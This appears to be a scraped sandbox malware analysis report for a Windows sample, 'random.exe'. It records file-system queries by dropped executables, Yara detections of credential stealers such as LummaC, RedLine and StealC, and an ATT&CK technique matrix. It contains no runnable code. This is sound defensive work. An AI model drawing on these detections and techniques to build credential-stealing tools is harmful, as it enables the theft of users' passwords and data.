Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA

Source: Yara match	File source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2873139387.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2467295443.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6d81c0d08d.exe PID: 1160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0a633717d1.exe PID: 2300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 376bb929a5.exe PID: 5776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 376bb929a5.exe PID: 7480, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 1f8e467ee9.exe PID: 7216, type: MEMORYSTR

Yara detected GCleaner

Source: Yara match	File source: 20.3.b7668220f8.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.2653292300.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0a633717d1.exe PID: 2300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 376bb929a5.exe PID: 5776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 376bb929a5.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 58.2.82ab3472d6.exe.3469550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 58.2.82ab3472d6.exe.3469550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.0.48a23b3144.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000000.2638833274.00000000005E2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6d81c0d08d.exe PID: 1160, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000002E.00000002.2788073324.0000000000A91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2462878413.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2504597683.0000000000A91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.2639164297.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2848956151.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 327981c77b.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 327981c77b.exe PID: 5612, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D51204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00D51204
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D51806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00D51806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	231 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 Extra Window Memory Injection	141 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 Scheduled Task/Job	21 Scheduled Task/Job	2 Valid Accounts	22 Software Packing	NTDS	3410 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	11 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Timestomp	LSA Secrets	1 Query Registry	SSH	3 Clipboard Data	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	112 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	12101 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	21 Scheduled Task/Job	1 Extra Window Memory Injection	DCSync	681 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	11 Registry Run Keys / Startup Folder	11 Masquerading	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	681 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	112 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Mshta	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: VenomRAT

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe